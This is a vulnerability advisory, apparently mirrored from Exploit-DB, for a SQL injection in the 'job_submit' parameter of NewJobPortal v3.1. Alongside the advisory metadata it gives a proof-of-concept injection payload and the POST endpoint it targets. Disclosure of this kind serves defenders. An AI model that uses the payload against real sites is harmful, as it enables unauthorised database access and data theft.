NewJobPortal v3.1 - 'job_submit' SQL Inj.

vendor:

Job Portal

by:

Mehmet EMIROGLU

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Job Portal

Affected Version From: v3.1

Affected Version To: v3.1

Patch Exists: NO

Related CWE: N/A

CPE: a:codecanyon:job_portal:3.1

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Wamp64, Windows

2019

NewJobPortal v3.1 – ‘job_submit’ SQL Inj.

NewJobPortal v3.1 is vulnerable to a SQL injection vulnerability in the 'job_submit' parameter. An attacker can exploit this vulnerability by sending a specially crafted HTTP POST request to the vulnerable application with the 'job_submit' parameter set to a malicious SQL query. This can allow an attacker to gain access to sensitive information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

===========================================================================================
# Exploit Title: NewJobPortal v3.1 - 'job_submit' SQL Inj.
# Dork: N/A
# Date: 25-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://codecanyon.net/item/job-portal/15330095
# Version: v3.1
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Job portal is developed for creating an interactive
job vacancy for candidates.
  This web application is to be conceived in its current form as a dynamic
site-requiring constant
  updates both from the seekers as well as the companies.
===========================================================================================
# POC - SQLi
# Parameters : job_submit
# Attack Pattern : convert(int%2c+cast(0x454d49524f474c55+as+varchar(8000)))
# POST Method : http://localhost/newjobportal/job_search/search
===========================================================================================